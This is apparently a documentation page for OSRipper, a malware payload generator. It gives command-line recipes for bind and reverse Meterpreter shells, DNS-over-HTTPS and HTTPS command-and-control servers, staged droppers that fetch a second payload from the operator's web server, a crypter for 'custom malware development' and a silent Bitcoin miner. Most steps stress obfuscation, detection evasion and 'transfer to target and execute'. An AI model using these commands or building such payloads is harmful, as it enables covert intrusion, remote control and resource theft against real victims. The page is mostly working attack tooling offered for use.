# Payload Types

OSRipper supports multiple payload types, each designed for specific use cases and scenarios. This guide covers all available payload types and their configurations.

## Table of Contents

- [Bind Shell Backdoor](#bind-shell-backdoor)
- [Reverse TCP Meterpreter](#reverse-tcp-meterpreter)
- [DNS-over-HTTPS C2](#dns-over-https-c2)
- [HTTPS C2 (Certificate Pinning)](#https-c2-certificate-pinning)
- [Staged Payloads](#staged-payloads)
- [Custom Code Crypter](#custom-code-crypter)
- [Silent BTC Miner](#silent-btc-miner)

---

## Bind Shell Backdoor

Opens a port on the victim machine and waits for incoming connections.

### Use Cases

- Direct access when reverse connections are blocked
- Internal network penetration testing
- Situations where you have network access to the target

### Generation

**CLI:**
```bash
osripper-cli bind -p 4444 --obfuscate --compile
```

**Interactive Mode:**
```bash
osripper
# Select option 1
```

**Parameters:**
- `-p, --port`: Port to bind to (1024-65535)
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay

### Connection

**Using Metasploit:**
```bash
msfconsole -q -x 'use python/meterpreter/bind_tcp; set RHOST target_ip; set RPORT 4444; exploit'
```

**Manual Connection:**
```bash
nc target_ip 4444
```

### Example

```bash
# Generate bind shell on port 4444
osripper-cli bind -p 4444 --obfuscate --enhanced --compile --delay

# Output: results/payload.bin
# Transfer to target and execute
```

---

## Reverse TCP Meterpreter

Encrypted reverse connection with SSL/TLS encryption. Connects back to your machine.

### Use Cases

- Standard penetration testing
- Red team exercises
- Bypassing firewalls
- Most common payload type

### Generation

**CLI:**
```bash
osripper-cli reverse -H 192.168.1.100 -p 4444 --obfuscate --compile
```

**With Ngrok:**
```bash
osripper-cli reverse --ngrok -p 4444 --obfuscate --compile
```

**Interactive Mode:**
```bash
osripper
# Select option 2
```

**Parameters:**
- `-H, --host`: Callback IP address
- `--ngrok`: Use ngrok tunneling
- `-p, --port`: Callback port (1024-65535)
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay

### Listener Setup

OSRipper automatically starts a Metasploit listener, or start manually:

```bash
msfconsole -q -x 'use multi/handler; set payload python/meterpreter/reverse_tcp_ssl; set LHOST 0.0.0.0; set LPORT 4444; exploit'
```

### Example

```bash
# Full-featured reverse shell
osripper-cli reverse -H 192.168.1.100 -p 4444 \
  --obfuscate \
  --enhanced \
  --compile \
  --icon app.ico \
  --delay \
  --output myshell

# Output: results/myshell.bin
# Transfer to target and execute
# Connection received in Metasploit
```

---

## DNS-over-HTTPS C2

Stealthy command & control channel using DNS-over-HTTPS protocol. Includes web UI for session management.

### Use Cases

- Bypassing network restrictions
- Long-term persistence
- Stealthy C2 operations
- Situations requiring web-based management

### Features

- DNS-over-HTTPS communication (blends with normal DNS traffic)
- Web UI for session management
- Automatic session persistence
- Command queueing for offline agents
- Real-time command execution

### Generation

**CLI:**
```bash
osripper-cli doh -d example.com --obfuscate --compile
```

**Via Web UI:**
1. Start C2 server: `python -m osripper.c2.server example.com`
2. Navigate to `http://localhost:5000`
3. Click "Generate Payload"
4. Select "DNS-over-HTTPS C2"
5. Enter domain name
6. Configure options and generate

**Parameters:**
- `-d, --domain`: C2 domain name (e.g., example.com)
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay
- `--testing`: Skip VM detection (for testing)

### C2 Server Setup

```bash
# Basic server
python -m osripper.c2.server example.com

# Custom port
python -m osripper.c2.server example.com --port 8080

# With HTTPS
python -m osripper.c2.server example.com --https

# Custom database location
python -m osripper.c2.server example.com --db /path/to/sessions.db
```

### Domain Configuration

For DoH C2 to work, your domain must resolve to your C2 server:

1. **DNS A Record**: Point domain to server IP
   ```
   example.com A 192.168.1.100
   ```

2. **DoH Endpoint**: Server handles `/dns-query` endpoint automatically

3. **Access Web UI**: Navigate to `http://your-domain:5000`

### Example Workflow

```bash
# 1. Start C2 server
python -m osripper.c2.server mydomain.com --port 5000

# 2. Generate payload
osripper-cli doh -d mydomain.com --obfuscate --compile --delay

# 3. Execute payload on target
# Payload connects via DoH

# 4. Access web UI
# Open browser: http://mydomain.com:5000
# View active sessions
# Execute commands via web interface
```

### Web UI Usage

1. **Dashboard**: View all active sessions
2. **Session Details**: Click session to view system info
3. **Command Terminal**: Execute commands and view responses
4. **Command History**: Track all executed commands

---

## HTTPS C2 (Certificate Pinning)

Secure HTTPS-based C2 with certificate pinning for authentication and security.

### Use Cases

- Secure C2 channels
- Authenticated communication
- Certificate validation
- Production C2 operations

### Features

- HTTPS encryption
- Certificate pinning (prevents MITM attacks)
- Web UI integration
- Session management
- Command execution

### Generation

**Via Web UI (Recommended):**
1. Start C2 server with HTTPS:
   ```bash
   python -m osripper.c2.server example.com --https
   ```

2. Get certificate fingerprint:
   ```bash
   curl http://localhost:5000/api/cert-fingerprint
   ```

3. Generate payload:
   - Navigate to `https://localhost:5000/generate`
   - Select "HTTPS C2 (Certificate Pinning)"
   - Enter base URL (e.g., `https://example.com`)
   - Certificate fingerprint auto-fills
   - Configure options and generate

**Manual Generation:**
```python
from osripper.generator import create_https_payload

create_https_payload(
    base_url="https://example.com",
    output_name="payload",
    stealth_delay=True,
    cert_fingerprint="SHA256_FINGERPRINT_HERE"
)
```

**Parameters:**
- `base_url`: Full HTTPS URL of C2 server
- `cert_fingerprint`: SHA256 certificate fingerprint (optional)
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay

### C2 Server Setup

```bash
# Start with HTTPS (auto-generates certificate)
python -m osripper.c2.server example.com --https

# Use custom certificate
python -m osripper.c2.server example.com \
  --https \
  --cert server.crt \
  --key server.key

# Custom port
python -m osripper.c2.server example.com --https --port 443
```

### Certificate Setup

**Self-Signed Certificate (Auto-Generated):**
- Server automatically generates certificate if not provided
- Certificate saved as `c2_server.crt` and `c2_server.key`
- Get fingerprint: `curl http://localhost:5000/api/cert-fingerprint`

**Custom Certificate:**
```bash
# Generate certificate
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

# Start server with custom certificate
python -m osripper.c2.server example.com --https --cert server.crt --key server.key
```

### Example

```bash
# 1. Start HTTPS C2 server
python -m osripper.c2.server example.com --https

# 2. Get certificate fingerprint
curl http://localhost:5000/api/cert-fingerprint

# 3. Generate payload via web UI
# Navigate to https://localhost:5000/generate
# Select HTTPS C2, enter URL and fingerprint
# Generate payload

# 4. Execute payload on target
# Payload connects via HTTPS with certificate validation

# 5. Manage sessions via web UI
# Access dashboard at https://example.com:5000
```

---

## Staged Payloads

Multi-stage web delivery payload for enhanced stealth. Downloads final payload from web server.

### Use Cases

- Enhanced stealth deployment
- Multi-stage attacks
- Web-based delivery
- Evading initial detection

### Generation

**CLI:**
```bash
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate --compile
```

**Interactive Mode:**
```bash
osripper
# Select option 5
```

**Parameters:**
- `-H, --host`: Web server IP address
- `--ngrok`: Use ngrok tunneling
- `-p, --port`: Web server port
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay

### Deployment

1. **Generate Staged Payload**: Creates dropper and main payload
2. **Web Server**: Automatically started on port 8000
3. **Dropper**: Small initial payload that downloads main payload
4. **Main Payload**: Full payload hosted on web server

### Example

```bash
# Generate staged payload
osripper-cli staged -H 192.168.1.100 -p 8080 --obfuscate --compile

# Output:
# - dropper.py (or dropper.bin if compiled)
# - webroot/payload_or.py (main payload)
# - Web server started on port 8000

# Deploy dropper to target
# Dropper downloads main payload from web server
# Main payload connects back to listener
```

---

## Custom Code Crypter

Obfuscate and encrypt any existing Python script.

### Use Cases

- Custom payload encryption
- Script obfuscation
- Protecting intellectual property
- Custom malware development

### Generation

**CLI:**
```bash
osripper-cli custom --script mypayload.py --obfuscate --enhanced --compile
```

**Interactive Mode:**
```bash
osripper
# Select option 3
```

**Parameters:**
- `--script`: Path to Python script (.py file)
- `--obfuscate`: Enable obfuscation
- `--enhanced`: Enhanced obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay
- `--output`: Output filename

### Example

```bash
# Obfuscate custom script
osripper-cli custom --script mypayload.py \
  --obfuscate \
  --enhanced \
  --compile \
  --output encrypted_payload

# Output: results/encrypted_payload.bin
```

### Script Requirements

- Must be valid Python 3.6+ code
- Should be self-contained (or include dependencies)
- Avoid hardcoded paths
- Test before obfuscation

---

## Silent BTC Miner

Cryptocurrency mining payload with stealth capabilities. **Note: Currently deprecated, standby for updates.**

### Use Cases

- Cryptocurrency mining
- Resource utilization
- Proof of concept

### Generation

**CLI:**
```bash
osripper-cli miner --address 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
```

**Interactive Mode:**
```bash
osripper
# Select option 4
```

**Parameters:**
- `--address`: Bitcoin payout address (26-35 characters)
- `--obfuscate`: Enable obfuscation
- `--compile`: Compile to binary
- `--delay`: Add stealth delay

### Monitoring

Monitor mining activity at: https://solo.ckpool.org/

---

## Payload Comparison

| Payload Type | Stealth | C2 UI | Encryption | Use Case |
|-------------|---------|-------|------------|----------|
| Bind Shell | Medium | No | No | Direct access |
| Reverse Shell | High | No | SSL/TLS | Standard pentesting |
| DoH C2 | Very High | Yes | HTTPS | Stealthy C2 |
| HTTPS C2 | Very High | Yes | HTTPS + Pin | Secure C2 |
| Staged | Very High | No | SSL/TLS | Multi-stage |
| Custom | Variable | No | Variable | Custom scripts |

## Best Practices

1. **Always use obfuscation** for production payloads
2. **Enable enhanced obfuscation** for maximum evasion
3. **Compile to binary** for easier deployment
4. **Add stealth delay** to avoid immediate detection
5. **Use DoH/HTTPS C2** for long-term operations
6. **Test payloads** in controlled environments first

---

*For more details on specific payload types, see the [Usage Guide](Usage-Guide) and [Advanced Features](Advanced-Features).*